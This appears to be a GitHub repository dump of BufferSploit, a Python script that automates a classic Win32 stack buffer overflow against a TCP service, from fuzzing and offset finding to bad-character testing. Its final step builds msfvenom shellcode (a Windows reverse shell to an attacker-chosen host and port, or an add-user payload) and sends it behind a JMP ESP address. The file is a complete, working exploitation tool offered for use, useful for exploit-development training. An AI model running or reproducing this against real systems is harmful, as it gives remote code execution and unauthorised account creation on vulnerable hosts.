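├── README.md
├── badchar.txt
├── buffersploit.py
└── requirements.txt

/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adithyan-ak/BufferSploit/b6aa96adabb2202bb983ff5ce1db5ceb8b918c73/README.md
--------------------------------------------------------------------------------

/badchar.txt:
--------------------------------------------------------------------------------
\x00,
--------------------------------------------------------------------------------

/buffersploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""BufferSploit: scripted workflow for a classic (non-SEH) Win32 stack overflow.

Each step is one CLI flag (see ``__main__``):

  -c          fuzz with growing 'A' buffers until the service stops answering
  -l N        send an msf-pattern_create pattern of N bytes (N must equal CRASH)
  -q VALUE    look up VALUE (the EIP contents at crash time) in that pattern
  -b          send every byte 0x01..0xff right after the return address
  -br XX      record XX as a bad character and resend the list without it
  -s          build an msfvenom payload avoiding the recorded bad chars, send it

The target, port and offsets are the module constants below and must be
edited before use. Only run this against a host you are authorised to test.

All external tools (msf-pattern_create, msf-pattern_offset, msfvenom) are
invoked without a shell, so CLI arguments, interactive input and the
contents of badchar.txt are never interpreted by /bin/sh.
"""

import argparse
import logging
import re
import socket
import subprocess
import sys

try:
    from colorama import Fore, init
except ImportError:  # colour is cosmetic; keep the tool usable without colorama
    class _NoColour:
        def __getattr__(self, _name):
            return ""

    Fore = _NoColour()

    def init(**_kwargs):
        pass

# Logs
logging.basicConfig(filename='logs',
                    level=logging.INFO,
                    format='%(asctime)s %(message)s',
                    datefmt='%d/%m/%Y %I:%M:%S %p')

init(autoreset=True)  # Colorama auto reset settings

IP = '192.168.1.108'       # Remote IP address of the vulnerable service
CRASH = 3000               # Size of the total payload when the EXE crashed
PORT = 9999                # Remote port where the EXE is listening
EBP = 2003                 # Bytes of filler before the saved return address (EIP)
EIP = ""                   # Address of JMP ESP, as 4 raw little-endian chars
NOPS = 30                  # Size of the NOP sled in front of the shellcode
TIMEOUT = 5                # Socket timeout (s); a hung service counts as a crash
cmd = "TRUN /.:/"          # Command prefix of the vulnerable parameter
BADCHAR_FILE = 'badchar.txt'

# Every byte 0x01..0xff. 0x00 is left out because it terminates C strings and
# is a bad character for practically every string-based overflow.
badcharlist = "".join(chr(i) for i in range(1, 256))


def _build_payload(eip, data):
    """Assemble filler + EIP + NOP sled + data + trailing filler.

    The trailing filler only accounts for EBP, the 4-byte EIP and the sled
    (same shape as the original crash buffer), so the wire size is CRASH
    plus the length of *data*.
    """
    filler = "\x43" * (CRASH - EBP - 4 - NOPS)
    return "\x41" * EBP + eip + "\x90" * NOPS + data + filler


def _parse_badchars(text):
    """Return the bad-character byte values recorded in *text* (badchar.txt).

    Entries are comma separated; each is accepted as ``\\xNN``, ``xNN`` or
    ``NN`` so files written by earlier versions still load. Empty entries
    (e.g. after the trailing comma) are skipped; malformed ones are logged
    and skipped rather than aborting the run. Duplicates are dropped.
    """
    values = []
    for entry in text.split(','):
        entry = entry.strip()
        if not entry:
            continue
        try:
            value = int(entry[-2:], 16)
        except ValueError:
            logging.info("Ignoring malformed bad character entry: %r", entry)
            continue
        if value not in values:
            values.append(value)
    return values


def _write_badchars(values):
    """Persist *values* to badchar.txt as ``\\x00,\\x04,`` (trailing comma kept)."""
    with open(BADCHAR_FILE, 'w') as f:
        f.write("".join("\\x%02x," % v for v in values))


def _load_badchars():
    """Read badchar.txt, creating it with only the null byte when missing."""
    try:
        with open(BADCHAR_FILE, 'r') as f:
            return _parse_badchars(f.read())
    except FileNotFoundError:
        logging.info("badchar.txt file not found, Creating a file with Null Byte")
        _write_badchars([0])
        return [0]


def _badchar_arg(values):
    """Format bad chars the way msfvenom ``-b`` expects: ``\\x00\\x04``."""
    return "".join("\\x%02x" % v for v in values)


def _open_socket():
    """Connect to IP:PORT with a timeout so a dead service cannot hang the script."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(TIMEOUT)
    s.connect((IP, PORT))
    return s


def Crash():
    """Fuzz with 'A' buffers growing by 100 bytes until the service stops responding.

    Stops at the first socket error (refused, reset or timeout) and reports
    the last size that was still accepted; that is the value to put in CRASH.
    """
    logging.info('Creating Buffer array with different Buffer size')
    for size in range(100, 10200, 100):  # 100 .. 10100, 101 steps
        logging.info("Fuzzing with %d bytes", size)
        print(Fore.RED + "Fuzzing with %s bytes" % size)
        try:
            logging.info("Trying to connect to %s:%s", IP, PORT)
            with _open_socket() as s:
                s.sendall(bytes(cmd + 'A' * size, "latin-1"))
                s.recv(1024)
        except OSError as e:
            error = str(e).split("]")[-1].strip()
            logging.info("Socket Error : %s", error)
            previous = size - 100
            logging.info("Program crashed while sending %d bytes", previous)
            if previous > 0:
                print(Fore.GREEN + "Program crashed while sending %s bytes" % previous)
            else:
                # Nothing was accepted at all: most likely a wrong IP/port.
                print(Fore.RED + "Error : " + error)
            sys.exit()


def sendPayload(buffer):
    """Send ``cmd + buffer`` to IP:PORT and wait for one reply.

    Socket errors are logged and reported rather than raised, because a
    crashed service is the expected outcome of most steps.
    """
    logging.info("Sending the Payload")
    logging.info("Payload: %r", buffer)
    print(Fore.RED + "Sending Payload ....")
    payload = cmd + buffer
    logging.info("Trying to connect to %s:%s", IP, PORT)
    try:
        with _open_socket() as s:
            s.sendall(bytes(payload, "latin-1"))
            s.recv(1024)
    except OSError as e:
        logging.info("Socket Error : %s", str(e).split("]")[-1])
        logging.info("Exception : Service is crashed or not Running")
        print(Fore.GREEN + "Either the service crashed or it's not running")
        return
    print(Fore.GREEN + "Payload Sent!")


def _run(cmdline):
    """Run a Metasploit helper without a shell and return its stdout as text.

    Arguments are passed as a list so values coming from the CLI, from
    interactive input or from badchar.txt can never be interpreted by the
    shell. Exits with a message if the tool is missing or returns non-zero.
    """
    logging.info("Running: %s", " ".join(cmdline))
    try:
        proc = subprocess.run(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    except FileNotFoundError:
        print(Fore.RED + "%s not found; is Metasploit on PATH?" % cmdline[0])
        sys.exit(1)
    if proc.returncode != 0:
        print(Fore.RED + "%s failed: %s" % (cmdline[0], proc.stderr.decode('latin-1').strip()))
        sys.exit(1)
    return proc.stdout.decode('latin-1')


def pattern_create(length):
    """Send an msf-pattern_create cyclic pattern of *length* bytes to the target."""
    length = int(length)  # numeric only; also rules out anything but digits
    logging.info("Creating a pattern of length : %d", length)
    print("Creating pattern of Length " + str(length))
    pattern = _run(["msf-pattern_create", "-l", str(length)]).strip()
    logging.info("Sending the Pattern to Host")
    sendPayload(pattern)


def pattern_offset(offset):
    """Print the offset of *offset* (the EIP value at crash time) in the pattern."""
    offset = str(offset)
    logging.info("Finding the offset address for %s", offset)
    print("Finding the offset address for " + offset)
    result = _run(["msf-pattern_offset", "-q", offset])
    logging.info("Offset result: %s", result.strip())
    print(result)


def send_badchars():
    """Send all bytes 0x01..0xff after a dummy return address (``BBBB``)."""
    logging.info("Sending Badchars")
    logging.info("Badchars : %r", badcharlist)
    print("Sending Badchars")
    sendPayload(_build_payload("\x42" * 4, badcharlist))


def remove_badchars(badchar):
    """Record *badchar* and resend the bad-char buffer without every recorded one.

    *badchar* may be given as ``04``, ``x04`` or ``\\x04``; the value is taken
    from its last two hex digits. Recording the same character twice is
    harmless. Exits with a message if the argument is not hex.
    """
    logging.info("Removing the Bad character %s from List", badchar)
    try:
        value = int(str(badchar)[-2:], 16)
    except ValueError:
        print(Fore.RED + "Bad character must be given as two hex digits, e.g. -br 04")
        sys.exit(1)

    known = _load_badchars()
    if value in known:
        logging.info("%s is already recorded as a bad character", badchar)
    else:
        logging.info("Appending the new Bad character")
        known.append(value)
        _write_badchars(known)

    excluded = set(known)
    remaining = "".join(ch for ch in badcharlist if ord(ch) not in excluded)
    logging.info("Sending %d characters after removing bad characters", len(remaining))
    sendPayload(_build_payload("\x42" * 4, remaining))


def _msfvenom_bytes(cmdline):
    """Run msfvenom with ``-f c`` and return the shellcode as a latin-1 string.

    Every ``\\xNN`` escape in the C output becomes the character with that
    code, so ``bytes(result, "latin-1")`` is the raw shellcode. Parsing by
    regex instead of line slicing is independent of msfvenom's exact layout.
    """
    output = _run(cmdline)
    code = "".join(chr(int(h, 16)) for h in re.findall(r"\\x([0-9a-fA-F]{2})", output))
    if not code:
        print(Fore.RED + "msfvenom produced no shellcode")
        sys.exit(1)
    return code


def shellcode(LHOST=None, LPORT=None):
    """Generate a payload with msfvenom (avoiding recorded bad chars) and send it.

    Requires EIP to hold exactly 4 raw bytes (the JMP ESP address); the
    payload layout is filler + EIP + NOP sled + shellcode + filler.
    """
    if len(EIP) != 4:
        logging.info("EIP location is empty or not 4 bytes.\n Set EIP Location")
        print("Please set the EIP Location (4 raw bytes, little-endian).")
        print(Fore.RED + "Exiting...")
        sys.exit()

    modules = {
        1: 'Windows Reverse Shell TCP',
        2: 'Windows User Add'
    }
    for key, value in modules.items():
        print(str(key) + " : " + value)

    try:
        choice = int(input(">> "))
    except ValueError:
        choice = 0
    if choice not in modules:
        print(Fore.RED + "Unknown option, exiting...")
        sys.exit(1)

    logging.info("Executing %s", modules[choice])
    print(Fore.GREEN + "Executing {}".format(modules[choice]))

    bad = _badchar_arg(_load_badchars())

    if choice == 1:
        if LHOST is None or LPORT is None:
            LHOST = input("Enter LHOST IP Address : ")
            LPORT = input("Enter LPORT Number : ")
        try:
            int(LPORT)
        except (TypeError, ValueError):
            print(Fore.RED + "LPORT must be a number")
            sys.exit(1)
        print("Generating shellcode")
        logging.info("Generating shellcode with LHOST=%s LPORT=%s", LHOST, LPORT)
        code = _msfvenom_bytes(["msfvenom", "-p", "windows/shell_reverse_tcp",
                                "LHOST=%s" % LHOST, "LPORT=%s" % LPORT,
                                "-b", bad, "-f", "c", "EXITFUNC=thread",
                                "--platform", "windows"])
    else:
        logging.info("Generating Code for Adding User")
        code = _msfvenom_bytes(["msfvenom", "-p", "windows/adduser",
                                "-b", bad, "-e", "x86/fnstenv_mov", "-f", "c"])

    logging.info("Shellcode: %r", code)
    sendPayload(_build_payload(EIP, code))


if __name__ == '__main__':
    logging.info('Starting Buffersploit')
    print(Fore.CYAN + '''

██████╗ ██╗ ██╗███████╗███████╗███████╗██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔══██╗██║ ██║██╔════╝██╔════╝██╔════╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
██████╔╝██║ ██║█████╗ █████╗ █████╗ ██████╔╝███████╗██████╔╝██║ ██║ ██║██║ ██║
██╔══██╗██║ ██║██╔══╝ ██╔══╝ ██╔══╝ ██╔══██╗╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██████╔╝╚██████╔╝██║ ██║ ███████╗██║ ██║███████║██║ ███████╗╚██████╔╝██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝

''')

    parser = argparse.ArgumentParser()
    parser.add_argument('-c', help='Crash bytes size', action='store_true')
    parser.add_argument('-l', help='Length for sending a random pattern')
    parser.add_argument('-q', help='Query to find the offset address')
    parser.add_argument('-b', help='Send Badchars to the target', action='store_true')
    parser.add_argument('-br', help='Specify the found badcharacter')
    parser.add_argument('-s', help='Generate Shellcode', action='store_true')
    parser.add_argument('--L', help='Local address for reverse shell')
    parser.add_argument('--P', help='Local Port for reverse shell')

    args = parser.parse_args()

    if args.c:
        logging.info('Performing Crash Operation')
        Crash()

    if args.l:
        logging.info('Performing Random Pattern Generation Operation')
        try:
            wanted = int(args.l)
        except ValueError:
            print("Pattern length must be a number, got {}".format(args.l))
            sys.exit(1)
        # The offset found with -q is only meaningful if the pattern is
        # exactly as long as the buffer that crashed the service.
        if wanted != CRASH:
            logging.info("Crash not equal to Patten length")
            print("Pattern length should be equal to CRASH ({}), got {}".format(CRASH, args.l))
            logging.info("Exiting...")
            sys.exit()

        pattern_create(wanted)

    if args.q:
        logging.info('Performing Operation to find Offset')
        pattern_offset(args.q)

    if args.b:
        logging.info('Performing Operation to check Badchar')
        send_badchars()

    if args.br:
        logging.info('Performing Operation to append new Badchar')
        remove_badchars(args.br)

    if args.s:
        logging.info('Performing Shellcode Operation')
        shellcode(args.L, args.P)

    logging.info("Exiting...")
--------------------------------------------------------------------------------

/requirements.txt:
--------------------------------------------------------------------------------
# Only colorama is a real dependency: argparse and binascii ship with Python 3.
# "argparse" on PyPI is a stale 2.x backport and "pycopy-binascii" is an unrelated
# MicroPython fork that shadows the stdlib module -- both should be dropped.
argparse
pycopy-binascii
colorama
--------------------------------------------------------------------------------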